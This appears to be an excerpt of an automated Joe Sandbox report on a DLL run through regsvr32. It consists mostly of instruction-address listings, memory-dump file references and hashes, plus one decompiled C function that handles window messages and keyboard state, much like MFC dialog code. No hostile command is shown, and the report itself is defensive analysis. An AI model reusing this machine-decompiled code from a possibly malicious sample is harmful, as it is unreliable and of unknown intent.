                                                                                                                0x1003b47f
                                                                                                                0x1003b486
                                                                                                                0x1003b486
                                                                                                                0x1003b489
                                                                                                                0x1003b490
                                                                                                                0x1003b493
                                                                                                                0x1003b496
                                                                                                                0x1003b499
                                                                                                                0x1003b49c
                                                                                                                0x1003b49f
                                                                                                                0x1003b4a3
                                                                                                                0x1003b4a7
                                                                                                                0x1003b4a8
                                                                                                                0x1003b6c8
                                                                                                                0x1003b6cc
                                                                                                                0x1003b6ce
                                                                                                                0x1003b6d7
                                                                                                                0x1003b6d9
                                                                                                                0x1003b6d9
                                                                                                                0x1003b6e6
                                                                                                                0x1003b6ee
                                                                                                                0x1003b6f0
                                                                                                                0x1003b71c
                                                                                                                0x1003b71f
                                                                                                                0x1003b724
                                                                                                                0x1003b729
                                                                                                                0x1003b754
                                                                                                                0x1003b754
                                                                                                                0x1003b757
                                                                                                                0x1003b760
                                                                                                                0x1003b763
                                                                                                                0x1003b838
                                                                                                                0x1003b838
                                                                                                                0x1003b83e
                                                                                                                0x1003b8f5
                                                                                                                0x1003b8f8
                                                                                                                0x1003b8fc
                                                                                                                0x1003b901
                                                                                                                0x1003b905
                                                                                                                0x1003b908
                                                                                                                0x1003b90a
                                                                                                                0x1003b90d
                                                                                                                0x1003b912
                                                                                                                0x00000000
                                                                                                                0x1003b908
                                                                                                                0x1003b848
                                                                                                                0x1003b86d
                                                                                                                0x1003b870
                                                                                                                0x1003b873
                                                                                                                0x1003b876
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b878
                                                                                                                0x00000000
                                                                                                                0x1003b889
                                                                                                                0x1003b890
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b8ed
                                                                                                                0x1003b8f0
                                                                                                                0x1003b8f3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b8a8
                                                                                                                0x1003b8ab
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b8b2
                                                                                                                0x1003b8b5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b895
                                                                                                                0x1003b898
                                                                                                                0x1003b89b
                                                                                                                0x1003b89d
                                                                                                                0x1003b8a0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b8bf
                                                                                                                0x1003b8c4
                                                                                                                0x1003b8c7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b8cf
                                                                                                                0x1003b8d2
                                                                                                                0x1003b8d4
                                                                                                                0x1003b8d8
                                                                                                                0x1003b8db
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b8df
                                                                                                                0x1003b8e2
                                                                                                                0x1003b8e5
                                                                                                                0x1003b8e6
                                                                                                                0x1003b8e7
                                                                                                                0x1003b8e8
                                                                                                                0x1003b8e9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b885
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b878
                                                                                                                0x1003b84c
                                                                                                                0x1003b851
                                                                                                                0x1003b857
                                                                                                                0x1003b859
                                                                                                                0x1003b85b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b861
                                                                                                                0x1003b867
                                                                                                                0x1003b77f
                                                                                                                0x1003b77f
                                                                                                                0x1003b784
                                                                                                                0x1003b784
                                                                                                                0x1003b787
                                                                                                                0x1003b790
                                                                                                                0x1003b790
                                                                                                                0x1003b795
                                                                                                                0x1003b79b
                                                                                                                0x1003b79e
                                                                                                                0x1003b7a0
                                                                                                                0x1003b7a4
                                                                                                                0x1003b7a6
                                                                                                                0x1003b7ae
                                                                                                                0x1003b7af
                                                                                                                0x1003b7b5
                                                                                                                0x1003b7b5
                                                                                                                0x1003b7b7
                                                                                                                0x1003b7bd
                                                                                                                0x1003b7c3
                                                                                                                0x1003b7cb
                                                                                                                0x1003b7d3
                                                                                                                0x1003b7d6
                                                                                                                0x1003b7d6
                                                                                                                0x1003b7e1
                                                                                                                0x1003b7e7
                                                                                                                0x1003b7e9
                                                                                                                0x1003b7f0
                                                                                                                0x1003b7f5
                                                                                                                0x1003b7f8
                                                                                                                0x1003b7f8
                                                                                                                0x1003b800
                                                                                                                0x1003b802
                                                                                                                0x1003b809
                                                                                                                0x1003b80e
                                                                                                                0x1003b811
                                                                                                                0x1003b811
                                                                                                                0x1003b819
                                                                                                                0x1003b81e
                                                                                                                0x1003b824
                                                                                                                0x1003b830
                                                                                                                0x1003b833
                                                                                                                0x00000000
                                                                                                                0x1003b833
                                                                                                                0x1003b76d
                                                                                                                0x1003b773
                                                                                                                0x1003b77a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b77c
                                                                                                                0x00000000
                                                                                                                0x1003b72b
                                                                                                                0x1003b72e
                                                                                                                0x1003b734
                                                                                                                0x1003b74f
                                                                                                                0x1003b74f
                                                                                                                0x1003b752
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b73a
                                                                                                                0x1003b73c
                                                                                                                0x1003b73e
                                                                                                                0x1003b744
                                                                                                                0x1003b745
                                                                                                                0x1003b74b
                                                                                                                0x1003b74b
                                                                                                                0x1003b74e
                                                                                                                0x1003b74e
                                                                                                                0x00000000
                                                                                                                0x1003b74e
                                                                                                                0x1003b740
                                                                                                                0x1003b742
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b742
                                                                                                                0x00000000
                                                                                                                0x1003b74f
                                                                                                                0x1003b4ae
                                                                                                                0x1003b4b2
                                                                                                                0x1003b4c2
                                                                                                                0x1003b4cd
                                                                                                                0x1003b4d0
                                                                                                                0x1003b4d8
                                                                                                                0x1003b4db
                                                                                                                0x1003b4de
                                                                                                                0x1003b4e4
                                                                                                                0x1003b4e4
                                                                                                                0x1003b4e8
                                                                                                                0x1003b4eb
                                                                                                                0x1003b4ee
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b4f4
                                                                                                                0x1003b4f9
                                                                                                                0x1003b4fc
                                                                                                                0x1003b502
                                                                                                                0x1003b505
                                                                                                                0x1003b508
                                                                                                                0x1003b50b
                                                                                                                0x1003b511
                                                                                                                0x1003b514
                                                                                                                0x1003b517
                                                                                                                0x1003b521
                                                                                                                0x1003b521
                                                                                                                0x1003b524
                                                                                                                0x1003b52c
                                                                                                                0x1003b52e
                                                                                                                0x1003b64b
                                                                                                                0x1003b650
                                                                                                                0x1003b653
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b655
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b65c
                                                                                                                0x1003b65f
                                                                                                                0x1003b661
                                                                                                                0x1003b667
                                                                                                                0x1003b671
                                                                                                                0x1003b678
                                                                                                                0x1003b67a
                                                                                                                0x1003b686
                                                                                                                0x1003b68a
                                                                                                                0x1003b68f
                                                                                                                0x1003b693
                                                                                                                0x1003b697
                                                                                                                0x1003b699
                                                                                                                0x1003b69c
                                                                                                                0x1003b6a1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b534
                                                                                                                0x1003b534
                                                                                                                0x1003b6a4
                                                                                                                0x1003b6a4
                                                                                                                0x1003b6a7
                                                                                                                0x1003b6a7
                                                                                                                0x1003b6ab
                                                                                                                0x00000000
                                                                                                                0x1003b6ab
                                                                                                                0x1003b53b
                                                                                                                0x1003b53f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b545
                                                                                                                0x00000000
                                                                                                                0x1003b55a
                                                                                                                0x1003b55d
                                                                                                                0x1003b55f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b582
                                                                                                                0x1003b586
                                                                                                                0x1003b58b
                                                                                                                0x1003b58e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b595
                                                                                                                0x1003b599
                                                                                                                0x1003b59e
                                                                                                                0x1003b5a1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b5a8
                                                                                                                0x1003b5ab
                                                                                                                0x1003b5ad
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b5b1
                                                                                                                0x1003b5b4
                                                                                                                0x1003b5b6
                                                                                                                0x1003b5b8
                                                                                                                0x1003b5b9
                                                                                                                0x1003b5bc
                                                                                                                0x1003b5c2
                                                                                                                0x1003b5c6
                                                                                                                0x1003b5c8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b5ce
                                                                                                                0x1003b5d0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b623
                                                                                                                0x1003b626
                                                                                                                0x1003b62a
                                                                                                                0x1003b62c
                                                                                                                0x1003b62e
                                                                                                                0x1003b62e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b633
                                                                                                                0x1003b637
                                                                                                                0x1003b63a
                                                                                                                0x1003b63d
                                                                                                                0x1003b63f
                                                                                                                0x1003b640
                                                                                                                0x1003b641
                                                                                                                0x1003b642
                                                                                                                0x1003b643
                                                                                                                0x1003b646
                                                                                                                0x1003b648
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b5db
                                                                                                                0x1003b5db
                                                                                                                0x1003b5de
                                                                                                                0x1003b5e0
                                                                                                                0x1003b5e2
                                                                                                                0x1003b5e3
                                                                                                                0x1003b5e6
                                                                                                                0x1003b5e9
                                                                                                                0x1003b5ee
                                                                                                                0x1003b5f1
                                                                                                                0x1003b5f5
                                                                                                                0x1003b5fb
                                                                                                                0x1003b5ff
                                                                                                                0x1003b601
                                                                                                                0x1003b607
                                                                                                                0x1003b607
                                                                                                                0x1003b60a
                                                                                                                0x1003b60d
                                                                                                                0x1003b610
                                                                                                                0x1003b615
                                                                                                                0x1003b619
                                                                                                                0x00000000
                                                                                                                0x1003b619
                                                                                                                0x1003b603
                                                                                                                0x1003b605
                                                                                                                0x1003b5d6
                                                                                                                0x1003b5d6
                                                                                                                0x00000000
                                                                                                                0x1003b5d6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b54c
                                                                                                                0x1003b54f
                                                                                                                0x1003b553
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b567
                                                                                                                0x1003b56a
                                                                                                                0x1003b56d
                                                                                                                0x1003b570
                                                                                                                0x1003b570
                                                                                                                0x1003b573
                                                                                                                0x1003b573
                                                                                                                0x1003b575
                                                                                                                0x1003b57a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b545
                                                                                                                0x1003b6ad
                                                                                                                0x1003b6ad
                                                                                                                0x1003b6b1
                                                                                                                0x1003b6b4
                                                                                                                0x1003b6bd
                                                                                                                0x1003b6bd
                                                                                                                0x1003b6c6
                                                                                                                0x00000000
                                                                                                                0x1003b6c6

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$Variant$ClearFree_memset$ChangeException@8H_prolog3ThrowTypelstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 4128688680-0
                                                                                                                • Opcode ID: 29c44fd8ba22138191f675dc56ed80d01559a1aa598323f94008261ca5ed00b7
                                                                                                                • Instruction ID: 84fc08546edbdc28cc08b8fc5503e57ba4d76b13c18cf0e412093733c6966a00
                                                                                                                • Opcode Fuzzy Hash: 29c44fd8ba22138191f675dc56ed80d01559a1aa598323f94008261ca5ed00b7
                                                                                                                • Instruction Fuzzy Hash: BDF167B4D0064ADFDF12CFA8C885AEDBBB4EF05345F104069EA51AB2A2DB349A55CF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10033257 Relevance: 26.0, APIs: 17, Instructions: 452windowkeyboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 84%
                                                                                                                			E10033257(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, struct tagMSG* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v24;
				int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				struct HWND__* _v52;
				signed int _t139;
				signed int _t141;
				void* _t142;
				signed int _t146;
				signed int _t149;
				intOrPtr _t150;
				signed int _t152;
				signed char _t153;
				signed int _t154;
				signed int _t155;
				int _t156;
				signed int _t161;
				signed int _t165;
				void* _t167;
				signed char _t171;
				signed int _t172;
				signed int _t173;
				signed int _t174;
				signed char _t182;
				intOrPtr _t183;
				signed int _t184;
				short _t188;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t195;
				signed int _t198;
				signed char _t199;
				signed int _t200;
				signed int _t201;
				short _t204;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				void* _t211;
				signed int _t215;
				signed int _t216;
				struct HWND__* _t217;
				struct tagMSG* _t221;
				intOrPtr _t224;
				void* _t231;
				void* _t234;
				struct tagMSG* _t240;
				signed int _t242;
				int _t243;
				signed int _t244;
				long _t247;
				intOrPtr _t249;
				signed int _t251;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				void* _t260;
				void* _t262;

				_t232 = __ecx;
				_t260 = _t262;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t139 = E100330B4(_a4, _a8);
				_t238 = _t139;
				if(_t139 == 0) {
					_t232 = _a4;
					_t231 = E100122D1(_a4);
					if(_t231 != 0) {
						_t221 =  *((intOrPtr*)(_t231 + 0x44));
						_a8 = _t221;
						if(_t221 != 0) {
							while(1) {
								_t9 = _t231 + 0x40; // 0x40
								_t232 = _t9;
								_t258 =  *(E10012115( &_a8));
								_t224 =  *((intOrPtr*)(_t258 + 4));
								if(_t224 != 0 && _t224 ==  *((intOrPtr*)(_t231 + 0x70))) {
									break;
								}
								if( *_t258 == 0 ||  *_t258 != GetFocus()) {
									if(_a8 != 0) {
										continue;
									} else {
									}
								} else {
									break;
								}
								goto L10;
							}
							_t238 = _t258;
						}
					}
				}
				L10:
				_t247 = 0;
				while(1) {
					_t238 = E10033106(_t232, _a4, _t238, _a12);
					if(_t238 == 0) {
						break;
					}
					_t142 = E10032BA1(_t238);
					_pop(_t232);
					if(_t142 == 0) {
						L14:
						if(_t238 == 0) {
							L21:
							__eflags =  *(_t238 + 4);
							if(__eflags == 0) {
								E1000A069(0, _t232, _t238, _t247, __eflags);
								asm("int3");
								_push(0x28);
								E10047680(0x1009095f, 0, _t238, _t247);
								_t146 = _a4;
								__eflags = _t146;
								if(_t146 != 0) {
									_v48 =  *((intOrPtr*)(_t146 + 0x20));
								} else {
									_v48 = _v48 & _t146;
								}
								_t240 = _a8;
								_t249 = _t240->message;
								_v32 = _t249;
								_v52 = GetFocus();
								_t149 = E10013FEA(0, _t232, _t260, _t148);
								_t229 = 0x100;
								__eflags = _t249 - 0x100;
								_v24 = _t149;
								if(_t249 < 0x100) {
									L34:
									__eflags = _t249 + 0xfffffe00 - 9;
									if(_t249 + 0xfffffe00 > 9) {
										goto L56;
									} else {
										goto L35;
									}
								} else {
									__eflags = _t249 - 0x109;
									if(_t249 <= 0x109) {
										L35:
										__eflags = _t149;
										if(_t149 == 0) {
											L56:
											_t251 = 0;
											_v28 = 0;
											_t150 = E10013FEA(_t229, _t232, _t260,  *_t240);
											_v44 = _v44 & 0;
											_v36 = _t150;
											_t152 = _v32 - _t229;
											__eflags = _t152;
											_v40 = 2;
											if(_t152 == 0) {
												_t153 = E10032AFB(_v36, _t240);
												_t232 =  *(_t240 + 8) & 0x0000ffff;
												__eflags = _t232 - 0x1b;
												if(__eflags > 0) {
													__eflags = _t232 - 0x25;
													if(_t232 < 0x25) {
														goto L75;
													} else {
														__eflags = _t232 - 0x26;
														if(_t232 <= 0x26) {
															_v44 = 1;
															goto L110;
														} else {
															__eflags = _t232 - 0x28;
															if(_t232 <= 0x28) {
																L110:
																_t171 = E10032AFB(_v24, _t240);
																__eflags = _t171 & 0x00000001;
																if((_t171 & 0x00000001) != 0) {
																	goto L75;
																} else {
																	__eflags = _v44;
																	_t232 = _a4;
																	_push(0);
																	if(_v44 == 0) {
																		_t172 = E10018415(_t229, _t232, _t240);
																	} else {
																		_t172 = E100183C7(_t229, _t232, _t240);
																	}
																	_t254 = _t172;
																	__eflags = _t254;
																	if(_t254 == 0) {
																		goto L75;
																	} else {
																		__eflags =  *(_t254 + 8);
																		if( *(_t254 + 8) != 0) {
																			_t232 = _a4;
																			E10017EC9(_a4, _t254);
																		}
																		__eflags =  *(_t254 + 4);
																		if( *(_t254 + 4) == 0) {
																			_t173 =  *_t254;
																			__eflags = _t173;
																			if(_t173 == 0) {
																				_t232 = _a4;
																				_t174 = E10032C12(_a4, _v24, _v44);
																			} else {
																				_t174 = E10013FEA(_t229, _t232, _t260, _t173);
																			}
																			_t242 = _t174;
																			__eflags = _t242;
																			if(_t242 == 0) {
																				goto L75;
																			} else {
																				_t229 = 0;
																				 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x4c)) + 0x70)) = 0;
																				E10032C5C(_t242);
																				__eflags =  *(_t254 + 8);
																				if( *(_t254 + 8) != 0) {
																					SendMessageA( *(_t242 + 0x20), 0xf1, 1, 0);
																				}
																				goto L125;
																			}
																		} else {
																			_t232 =  *(_t254 + 4);
																			 *((intOrPtr*)( *( *(_t254 + 4)) + 0xac))(_t240);
																			goto L125;
																		}
																	}
																}
															} else {
																__eflags = _t232 - 0x2b;
																if(_t232 != 0x2b) {
																	goto L75;
																} else {
																	goto L97;
																}
															}
														}
													}
													goto L126;
												} else {
													if(__eflags == 0) {
														L103:
														_t243 = 0;
														__eflags = 0;
														goto L104;
													} else {
														__eflags = _t232 - 3;
														if(_t232 == 3) {
															goto L103;
														} else {
															__eflags = _t232 - 9;
															if(_t232 == 9) {
																__eflags = _t153 & 0x00000002;
																if((_t153 & 0x00000002) != 0) {
																	goto L75;
																} else {
																	_t188 = GetKeyState(0x10);
																	_t255 = _a4;
																	__eflags = _t188;
																	_t229 = 0 | _t188 < 0x00000000;
																	_t232 = _t255;
																	_t189 = E10017D72(_t255, 0, _t188 < 0);
																	__eflags = _t189;
																	if(_t189 == 0) {
																		goto L75;
																	} else {
																		__eflags =  *(_t189 + 4);
																		if( *(_t189 + 4) == 0) {
																			_t190 =  *_t189;
																			__eflags = _t190;
																			if(_t190 == 0) {
																				_t232 = _t255;
																				_t191 = E1001B7D4(_t255, _v36, _t229);
																			} else {
																				_t191 = E10013FEA(_t229, _t232, _t260, _t190);
																			}
																			_t244 = _t191;
																			__eflags = _t244;
																			if(_t244 != 0) {
																				 *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) =  *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) & 0x00000000;
																				E10032C5C(_t244);
																				L10032E26(_t229, _t232, _t260, _v24, _t244);
																				_pop(_t232);
																			}
																		} else {
																			_t195 =  *(_t189 + 4);
																			_t232 = _t195;
																			 *((intOrPtr*)( *_t195 + 0xac))(_t240);
																		}
																		goto L125;
																	}
																}
																goto L126;
															} else {
																__eflags = _t232 - 0xd;
																if(_t232 == 0xd) {
																	L97:
																	__eflags = _t153 & 0x00000004;
																	if((_t153 & 0x00000004) != 0) {
																		goto L75;
																	} else {
																		_t182 = E10032BF1(_v24);
																		__eflags = _t182 & 0x00000010;
																		_pop(_t232);
																		if((_t182 & 0x00000010) == 0) {
																			_t183 = L10032FA7(_a4);
																		} else {
																			_t251 = _v24;
																			_t232 = _t251;
																			_t183 = E100178C1(_t251);
																		}
																		_t243 = 0;
																		__eflags = _t251;
																		_v40 = _t183;
																		if(_t251 != 0) {
																			L105:
																			_t232 = _t251;
																			_t184 = E1001795E(_t251);
																			__eflags = _t184;
																			if(_t184 != 0) {
																				__eflags =  *((intOrPtr*)(_t251 + 0x50)) - _t243;
																				if( *((intOrPtr*)(_t251 + 0x50)) == _t243) {
																					goto L75;
																				} else {
																					_push(_t243);
																					_push(_t243);
																					_push(_t243);
																					_push(1);
																					_push(0xfffffdd9);
																					_push(_t251);
																					_v8 = _t243;
																					E100179BB();
																					_v8 = _v8 | 0xffffffff;
																					goto L125;
																				}
																			} else {
																				MessageBeep(_t243);
																				goto L75;
																			}
																		} else {
																			L104:
																			_t251 = L10032EA1(_a4, _v40);
																			__eflags = _t251 - _t243;
																			if(_t251 == _t243) {
																				goto L75;
																			} else {
																				goto L105;
																			}
																		}
																	}
																	goto L126;
																} else {
																	goto L75;
																}
															}
														}
													}
												}
												goto L79;
											} else {
												_t198 = _t152;
												__eflags = _t198;
												if(_t198 == 0) {
													L62:
													_t199 = E10032AFB(_v36, _t240);
													__eflags = _v32 - 0x102;
													if(_v32 != 0x102) {
														L64:
														_t232 =  *(_t240 + 8) & 0x0000ffff;
														__eflags = _t232 - 9;
														if(_t232 != 9) {
															L66:
															__eflags = _t232 - 0x20;
															if(__eflags == 0) {
																goto L54;
															} else {
																_push(_t240);
																_t200 = E10033257(_t229, _t232, _t240, _t251, __eflags, _a4, _v36);
																__eflags = _t200;
																if(_t200 == 0) {
																	goto L75;
																} else {
																	_t201 =  *(_t200 + 4);
																	__eflags = _t201;
																	if(_t201 == 0) {
																		goto L75;
																	} else {
																		_t232 = _t201;
																		E1002C8CD(_t201, _t240);
																		L125:
																		_v28 = 1;
																	}
																}
																goto L79;
															}
														} else {
															__eflags = _t199 & 0x00000002;
															if((_t199 & 0x00000002) != 0) {
																goto L75;
															} else {
																goto L66;
															}
														}
													} else {
														__eflags = _t199 & 0x00000084;
														if((_t199 & 0x00000084) != 0) {
															goto L75;
														} else {
															goto L64;
														}
													}
												} else {
													__eflags = _t198 != 4;
													if(_t198 != 4) {
														L75:
														_t154 = _a4;
														__eflags =  *(_t154 + 0x3c) & 0x00001000;
														if(( *(_t154 + 0x3c) & 0x00001000) == 0) {
															_t165 = IsDialogMessageA( *(_t154 + 0x20), _a8);
															__eflags = _t165;
															_v28 = _t165;
															if(_t165 != 0) {
																_t167 = E10013FEA(_t229, _t232, _t260, GetFocus());
																__eflags = _t167 - _v24;
																if(_t167 != _v24) {
																	L10032DB9(_t232, E10013FEA(_t229, _t232, _t260, GetFocus()));
																	_pop(_t232);
																}
															}
														}
														L79:
														_t155 = IsWindow(_v52);
														__eflags = _t155;
														if(_t155 != 0) {
															L10032E26(_t229, _t232, _t260, _v24, E10013FEA(_t229, _t232, _t260, GetFocus()));
															_pop(_t234);
															_t161 = IsWindow(_v48);
															__eflags = _t161;
															if(_t161 != 0) {
																L10032FD4(_a4, _v24, E10013FEA(_t229, _t234, _t260, GetFocus()));
															}
														}
														_t156 = _v28;
													} else {
														__eflags = _v24;
														if(_v24 != 0) {
															L61:
															__eflags =  *(_t240 + 8) - 0x20;
															if( *(_t240 + 8) == 0x20) {
																goto L75;
															} else {
																goto L62;
															}
														} else {
															_t204 = GetKeyState(0x12);
															__eflags = _t204;
															if(_t204 >= 0) {
																goto L75;
															} else {
																goto L61;
															}
														}
													}
												}
											}
										} else {
											_t256 = _t149;
											while(1) {
												__eflags =  *(_t256 + 0x50);
												if( *(_t256 + 0x50) != 0) {
													break;
												}
												_t211 = E10013FEA(_t229, _t232, _t260, GetParent( *(_t256 + 0x20)));
												__eflags = _t211 - _a4;
												if(_t211 != _a4) {
													_t256 = E10013FEA(_t229, _t232, _t260, GetParent( *(_t256 + 0x20)));
													__eflags = _t256;
													if(_t256 != 0) {
														continue;
													}
												}
												break;
											}
											__eflags = _t256;
											if(_t256 == 0) {
												L45:
												__eflags = _v32 - 0x101;
												if(_v32 == 0x101) {
													L48:
													__eflags = _t256;
													if(_t256 == 0) {
														goto L55;
													} else {
														_t257 =  *(_t256 + 0x50);
														__eflags = _t257;
														if(_t257 == 0) {
															goto L55;
														} else {
															_t206 = _a8->wParam & 0x0000ffff;
															__eflags = _t206 - 0xd;
															if(_t206 != 0xd) {
																L52:
																__eflags = _t206 - 0x1b;
																if(_t206 != 0x1b) {
																	goto L55;
																} else {
																	__eflags =  *(_t257 + 0x84) & 0x00000002;
																	if(( *(_t257 + 0x84) & 0x00000002) == 0) {
																		goto L55;
																	} else {
																		goto L54;
																	}
																}
															} else {
																__eflags =  *(_t257 + 0x84) & 0x00000001;
																if(( *(_t257 + 0x84) & 0x00000001) != 0) {
																	L54:
																	_t156 = 0;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags = _v32 - _t229;
													if(_v32 == _t229) {
														goto L48;
													} else {
														__eflags = _v32 - 0x102;
														if(_v32 != 0x102) {
															L55:
															_t240 = _a8;
															goto L56;
														} else {
															goto L48;
														}
													}
												}
											} else {
												_t207 =  *(_t256 + 0x50);
												__eflags = _t207;
												if(_t207 == 0) {
													goto L45;
												} else {
													__eflags =  *(_t207 + 0x58);
													if( *(_t207 + 0x58) == 0) {
														goto L45;
													} else {
														_t208 =  *(_t207 + 0x58);
														_t232 =  *_t208;
														_t209 =  *((intOrPtr*)( *_t208 + 0x14))(_t208, _a8);
														__eflags = _t209;
														if(_t209 != 0) {
															goto L45;
														} else {
															_t156 = _t209 + 1;
														}
													}
												}
											}
										}
									} else {
										goto L34;
									}
								}
								return E10047725(_t156);
							} else {
								_t232 =  *(_t238 + 4);
								_t215 =  *((intOrPtr*)( *( *(_t238 + 4)) + 0x78))();
								__eflags = _t215 & 0x08000000;
								if((_t215 & 0x08000000) == 0) {
									goto L20;
								} else {
									goto L23;
								}
							}
						} else {
							_t216 =  *(_t238 + 4);
							if(_t216 == 0) {
								_t217 =  *_t238;
							} else {
								_t217 =  *(_t216 + 0x24);
							}
							if(_t217 == 0) {
								goto L21;
							} else {
								if(IsWindowEnabled(_t217) == 0) {
									L23:
									__eflags = _t238 - _v8;
									if(_t238 == _v8) {
										break;
									} else {
										__eflags = _v8;
										if(_v8 == 0) {
											_v8 = _t238;
										}
										_t247 = _t247 + 1;
										__eflags = _t247 - 0x200;
										if(_t247 < 0x200) {
											continue;
										} else {
											break;
										}
									}
								} else {
									L20:
									_t141 = _t238;
									L28:
									return _t141;
								}
							}
						}
					} else {
						_t232 = _a4;
						_t238 = E10017D72(_a4, _t238, 0);
						if(_t238 == 0) {
							break;
						} else {
							goto L14;
						}
					}
					L126:
				}
				_t141 = 0;
				__eflags = 0;
				goto L28;
			}





































































                                                                                                                0x10033257
                                                                                                                0x10033258
                                                                                                                0x1003325a
                                                                                                                0x1003325b
                                                                                                                0x1003325f
                                                                                                                0x10033260
                                                                                                                0x10033261
                                                                                                                0x10033268
                                                                                                                0x1003326d
                                                                                                                0x10033271
                                                                                                                0x10033273
                                                                                                                0x1003327b
                                                                                                                0x1003327f
                                                                                                                0x10033281
                                                                                                                0x10033286
                                                                                                                0x10033289
                                                                                                                0x1003328b
                                                                                                                0x1003328f
                                                                                                                0x1003328f
                                                                                                                0x10033297
                                                                                                                0x10033299
                                                                                                                0x1003329e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100332a8
                                                                                                                0x100332b8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100332ba
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100332a8
                                                                                                                0x100332bc
                                                                                                                0x100332bc
                                                                                                                0x10033289
                                                                                                                0x1003327f
                                                                                                                0x100332be
                                                                                                                0x100332be
                                                                                                                0x100332c0
                                                                                                                0x100332cc
                                                                                                                0x100332d2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100332d5
                                                                                                                0x100332dc
                                                                                                                0x100332dd
                                                                                                                0x100332ef
                                                                                                                0x100332f1
                                                                                                                0x10033314
                                                                                                                0x10033314
                                                                                                                0x10033317
                                                                                                                0x10033347
                                                                                                                0x1003334c
                                                                                                                0x1003334d
                                                                                                                0x10033354
                                                                                                                0x10033359
                                                                                                                0x1003335c
                                                                                                                0x1003335e
                                                                                                                0x10033368
                                                                                                                0x10033360
                                                                                                                0x10033360
